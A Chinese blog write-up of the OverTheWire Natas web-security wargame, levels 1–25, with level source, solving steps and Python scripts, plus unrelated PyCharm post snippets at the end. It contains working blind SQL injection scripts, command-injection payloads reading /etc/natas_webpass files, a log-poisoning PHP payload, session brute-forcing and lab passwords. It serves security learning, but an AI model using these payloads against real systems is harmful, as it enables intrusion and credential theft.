Natas关卡学Web漏洞目前1~25关卡(write up)

于 2025-02-25 01:47:58 发布
阅读量709 收藏 12
点赞数 16
文章标签: natas 靶场 网络安全 burp suite wargames CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69100706/article/details/145817745
版权

注:每一关的账号为natas+x 其中x为关卡数,关卡通关的条件是得到下一关卡的password

        建议用 burp suite(方便且强大)

第一关:

You can find the password for the next level on this page,but rightclicking has been blocked!

你可以在这个页面上找到下一个级别的密码,但是右键被阻止了!

右键通常可以查看网页源代码,提示的很明显

F12,查看element,查看content得到

得到:<!--The password for natas2 is TguMNxKo1DSaltujBLuZJnDUlCcUAPII->

第二关:

F12

或者右键查看源码效果一样

有 files/pixel.png 提示,尝试

../../../files/

打开user.txt

得到:natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

第三关:

前两关菜鸟方法行不通了

需要了解robots.txt   robots.txt_web服务器上存在robot(s).txt-CSDN博客

../../../robots.txt/

../../../s3cr3t/

得到:natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

第四关:

Access disallowed.You are visiting from "while authorized users should come only from
"http://natas5.natas.labs.overthewire.org/"

不允许访问。您是从“授权用户”访问的应该只来自“http://natas5.natas.labs.overthewire.org/”

需要点 refresh page  抓的包才有referer

右键 发送到 repeater(重放器)将referer的natas4改为natas5

得到:0n35PkggAPm2zbEpOU802c0x0Msn1ToK

第五关:

看抓包,logged=0

修改 logged=1

得到:natas6 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

第六关:

查看 view sourcecode

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

尝试

../../../includes/secret.inc

FOEIUWGHFEEUHOFUOIU

得到:natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

第七关:

?page=/etc/natas_webpass/natas8

得到: natas8  xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

第八关:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

import base64


secret="3d3d516343746d4d6d6c315669563362"

a=bytes.fromhex(secret)
reversed_str=a[::-1]
m=base64.b64decode(reversed_str)
print(m)

得到:natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

第九关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
. /etc/natas_webpass/natas10 #

得到:natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

第十关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

得到:natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

第十一关:

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>
import base64
import json
from urllib.parse import unquote, quote

# 原始Cookie数据
original_cookie = "HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg%3D"

# 步骤1:解码Cookie
decoded_cookie = unquote(original_cookie)  # URL解码
ciphertext = base64.b64decode(decoded_cookie)  # Base64解码

# 步骤2:生成已知明文
default_data = {"showpassword": "no", "bgcolor": "#ffffff"}
plaintext = json.dumps(default_data, separators=(",", ":")).encode()  # 紧凑JSON格式

# 步骤3:计算XOR密钥流
key_stream = bytes([p ^ c for p, c in zip(plaintext, ciphertext)])

# 步骤4:自动检测重复密钥
def find_repeating_key(stream, max_len=20):
    for n in range(1, max_len+1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return None

key = find_repeating_key(key_stream)
print(f"[+] 破解密钥: {key.decode(errors='ignore')}")

# 步骤5:构造新数据并加密
new_data = {"showpassword": "yes", "bgcolor": "#ffffff"}
new_json = json.dumps(new_data, separators=(",", ":")).encode()
new_cipher = bytes([b ^ key[i % len(key)] for i, b in enumerate(new_json)])

# 步骤6:生成新Cookie
new_cookie = base64.b64encode(new_cipher).decode()
final_cookie = quote(new_cookie)  # URL编码特殊字符
print(f"[+] 新Cookie值: {final_cookie}")

# 使用此Cookie访问页面即可显示密码

[+] 破解密钥: eDWo
[+] 新Cookie值: HmYkBwozJw4WNyAAFyB1VUc9MhxHaHUNAic4Awo2dVVHZzEJAyIxCUc5

得到:The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

第十二关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

得到:trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

第十三关:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

关键:生成的随机名称的.jpg 改为  .php  用GIF89a 骗过文件头校验

得到:GIF89az3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

第十四关:

<?php
if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas14', '<censored>');
    mysqli_select_db($link, 'natas14');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysqli_close($link);
} else {
?>

得到:natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

第十五关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>

import requests
from requests.auth import HTTPBasicAuth
import time

url = "http://natas15.natas.labs.overthewire.org/index.php"
auth = HTTPBasicAuth("natas15", "SdqIqBsFcz3yotlNYErZSZwblkm0lrvx")  # 使用新密码
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36"}

for i in range(1, 33):  # 密码长度为 32
    for char in charset:
        payload = f'natas16" AND SUBSTRING(password, {i}, 1) = BINARY "{char}" -- '
        data = {"username": payload}
        try:
            response = requests.post(url, auth=auth, data=data, headers=headers, timeout=10)
            response.raise_for_status()  # 检查 HTTP 错误
            if "This user exists" in response.text:
                password += char
                print(f"[+] 第 {i} 位: {char} → 当前密码: {password}")
                break
            else:
                print(f"[-] 测试位置 {i} 字符 {char} → 无匹配")
        except requests.exceptions.RequestException as e:
            print(f"[!] 请求失败: {e}")
        time.sleep(0.5)  # 避免触发速率限制
print(f"[*] 最终密码: {password}")

得到:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

第十六关:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
import requests

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password = ''
target = 'http://natas16.natas.labs.overthewire.org/'
auth = ('natas16', 'hPkjKYviLQctEW33QmuXL6eDVfMW4sGo')

for i in range(32):
    for c in chars:
        # 构造精准 payload
        url = f"{target}?needle=$(grep ^{password + c} /etc/natas_webpass/natas17)African"
        r = requests.get(url, auth=auth)
        
        # 关键判断:若 'African' 不在响应中,说明密码字符正确
        if 'African' not in r.text:
            password += c
            print(f'找到第 {i+1} 位: {c} → 当前密码: {password.ljust(32, "*")}')
            break
print(f'最终密码: {password}')

得到:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

第十七关:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '<censored>');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
username= 'natas17'
password= 'EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC'
key = ""
 
for pos in range(1, 33): # 32 位密码
    low = 48          # 这里采用 ascii 码来查找,最小的 ascii 为48
    high = 122        # 最大的 ascii 为48
    mid = (high+low)>>1        # 折半查找
    
    while mid<high:
        
        # 每次取 password 字段中的一位密码,最后用 "" like " 来闭合 sql 语句
        payload= "natas18\" and if(%d < ascii(mid(password,%d,1)), sleep(2), 1) and \"\" like \"" %  (mid, pos)
        try:
            req = requests.post(url, auth = requests.auth.HTTPBasicAuth(username,password),data={"username":payload}, timeout=2)
        except requests.exceptions.Timeout:
            low = mid + 1
            mid = (high+low)>>1
            continue
        
        high=mid 
        mid = (high+low)>>1 
    key+=chr(mid)
    print(key)

得到:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

第十八关:

<?php

$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
}

if($showform) {
?>
import requests

url = 'http://natas18.natas.labs.overthewire.org/'
auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')

for session_id in range(1, 641):
    cookies = {'PHPSESSID': str(session_id)}
    try:
        response = requests.get(url, auth=auth, cookies=cookies, timeout=5)
        if 'You are an admin' in response.text:
            print(f"[+] 成功找到有效会话ID: {session_id}")
            print("[+] 密码信息如下:")
            print(response.text.split('<pre>')[1].split('</pre>')[0])
            break
        else:
            print(f"[-] 尝试会话ID {session_id}:非管理员")
    except Exception as e:
        print(f"[!] 会话ID {session_id} 请求失败: {e}")

得到:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

第十九关:

import binascii

import requests

# proxie = {'http': 'http://127.0.0.1:8080'}
url = 'http://natas19.natas.labs.overthewire.org/'
header = {'Authorization': 'Basic bmF0YXMxOTp0bndFUjdQZGZXa3hzRzRGTldVdG9BWjlWeVpUSnFKcg=='}

for uid in range(91, 641):
    payload = str(uid) + '-admin'
    suid = str(binascii.b2a_hex(bytes(payload, encoding='utf-8')), encoding='utf8')
    cookie = {'__utma': '176859643.1701764875.1629551603.1632719883.1632842691.23',
              '__utmz': '176859643.1629551603.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic',
              '__utmb': '=176859643.3.10.1632842691',
              '__utmc': '176859643',
              '__utmt': '1',
              'PHPSESSID': suid}

    res = requests.get(url, headers=header, cookies=cookie)
    if 'You are an admin' in res.text:
        print(res.text)
        break
    else:
        print(str(uid) + ' failure')

得到:p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

第二十关:

<?php

function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas21\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
    }
}
/* }}} */

/* we don't need this */
function myopen($path, $name) {
    //debug("MYOPEN $path $name");
    return true;
}

/* we don't need this */
function myclose() {
    //debug("MYCLOSE");
    return true;
}

function myread($sid) {
    debug("MYREAD $sid");
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode() ?: "";
}

function mywrite($sid, $data) {
    // $data contains the serialized version of $_SESSION
    // but our encoding is better
    debug("MYWRITE $sid $data");
    // make sure the sid is alnum only!!
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID");
        return;
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    $data = "";
    debug("Saving in ". $filename);
    ksort($_SESSION);
    foreach($_SESSION as $key => $value) {
        debug("$key => $value");
        $data .= "$key $value\n";
    }
    file_put_contents($filename, $data);
    chmod($filename, 0600);
    return true;
}

/* we don't need this */
function mydestroy($sid) {
    //debug("MYDESTROY $sid");
    return true;
}
/* we don't need this */
function mygarbage($t) {
    //debug("MYGARBAGE $t");
    return true;
}

session_set_save_handler(
    "myopen",
    "myclose",
    "myread",
    "mywrite",
    "mydestroy",
    "mygarbage");
session_start();

if(array_key_exists("name", $_REQUEST)) {
    $_SESSION["name"] = $_REQUEST["name"];
    debug("Name set to " . $_REQUEST["name"]);
}

print_credentials();

$name = "";
if(array_key_exists("name", $_SESSION)) {
    $name = $_SESSION["name"];
}

?>

关键:先发post请求  name注入  

name=test%0Aadmin%201

后切换为get请求 (没有name参数)

得到:Username: natas21  Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

第二十一关:

<?php

function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas22\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}
/* }}} */

session_start();
print_credentials();

?>
<?php

session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
    $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
    $val = $_SESSION[$key];
    } else {
    $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?>

<p>Example:</p>
<?=$example?>

<p>

关键:a(原页面)的cookie给b(新页面)用burp suite时建议新开窗口

b 注入debug  和 admin=1   需要点update 抓包才能有相关参数

得到:Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

第二十二关:

<?php
session_start();

if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
    header("Location: /");
    }
}
?>

得到:Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

第二十三关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas24 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

得到:Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

第二十四关:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(!strcmp($_REQUEST["passwd"],"<censored>")){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas25 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>

得到:Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

第二十五关:

<?php
    // cheers and <3 to malvina
    // - morla

    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
    
    function listFiles($path){
        $listoffiles=array();
        if ($handle = opendir($path))
            while (false !== ($file = readdir($handle)))
                if ($file != "." && $file != "..")
                    $listoffiles[]=$file;
        
        closedir($handle);
        return $listoffiles;
    } 
    
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
?>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>

<?php  
    session_start();
    setLanguage();
    
    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

关键:get请求注入

?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_km9vk0t9rhu3jh3o92do0aghio.log

user agent 注入

<? readfile("/etc/natas_webpass/natas26");?>

仔细核对 注入 不然没结果

得到:natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

第二十六关:

<?php
    // sry, this is ugly as hell.
    // cheers kaliman ;)
    // - morla

    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->initMsg);
            fclose($fd);
        }

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }
    }

    function showImage($filename){
        if(file_exists($filename))
            echo "<img src=\"$filename\">";
    }

    function drawImage($filename){
        $img=imagecreatetruecolor(400,300);
        drawFromUserdata($img);
        imagepng($img,$filename);
        imagedestroy($img);
    }

    function drawFromUserdata($img){
        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);
            imageline($img,$_GET["x1"], $_GET["y1"],
                            $_GET["x2"], $_GET["y2"], $color);
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
            if($drawing)
                foreach($drawing as $object)
                    if( array_key_exists("x1", $object) &&
                        array_key_exists("y1", $object) &&
                        array_key_exists("x2", $object) &&
                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);
                        imageline($img,$object["x1"],$object["y1"],
                                $object["x2"] ,$object["y2"] ,$color);

                    }
        }
    }

    function storeData(){
        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }

        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }

        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }
?>
<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){
        $imgfile="img/natas26_" . session_id() .".png";
        drawImage($imgfile);
        showImage($imgfile);
        storeData();
    }

?>

---------------------------为什么没有后面关卡,是php反序列化害了他------------------------------------------

攻略证明:

natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK

natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned

$secret = "FOEIUWGHFEEUHOFUOIU"

natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

natas8 xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

natas13 trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

natas14 GIF89a z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

natas16 hPkjKYviLQctEW33QmuXL6eDVfMW4sGo

natas17 EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

natas18 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

Username: natas19 Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

natas20 Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Username: natas21 Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz

Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs

Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

Cannot load settings from file:PyCharm打开本地项目显示项目文件
风口IT猪的成长录
08-10 2973
PyCharm:Cannot load settings from file.1. Cannot load settings from file.2. 打开本地项目显示项目文件 1. Cannot load settings from file. 使用 PyCharm 时,Project Structure 存在多余空的Project时,每次打开 PyCharm ,都会显示 Cannot load settings from file. 原因:可能是由于Project创建时的root切换,或者为空,
PyCharm打开本地项目重启后消失(解决Project能删除问题)
风口IT猪的成长录
08-10 2285
PyCharm打开本地项目重启后消失问题描述解决办法删除Project 问题描述 从本地导入一个项目,在原来的 Project 修改 root 目录,并修改编译器,重启后该项目消失。 解决办法 新建一个Project导入项目所在目录,重新attach当前WorkSpace,即可搞定! 删除Project 当我们创建的project过多时,有时候想用,但是发现PyCharm能删除,只能重命名。如果你想删除的话,可以在下一次创建项目时,覆盖原来的项目,之后可以rename,也算一种删除,这样就用每次都
PyCharm问题:PyCharm打开本地项目显示项目文件
weixin_42580692的博客
01-09 1928
软件:PyCharm 2016.3。
Pycharm加载项目时异常,看到自己的项目文件
綦枫Maple的博客
11-08 2386
最近看到一个朋友问,他把项目导入pycharm为什么项目的包项目显示,只在projects file显示
Pycharm项目目录显示,只有文件没有文件夹了,左侧栏颜色黄色
2301_79485441的博客
09-26 3064
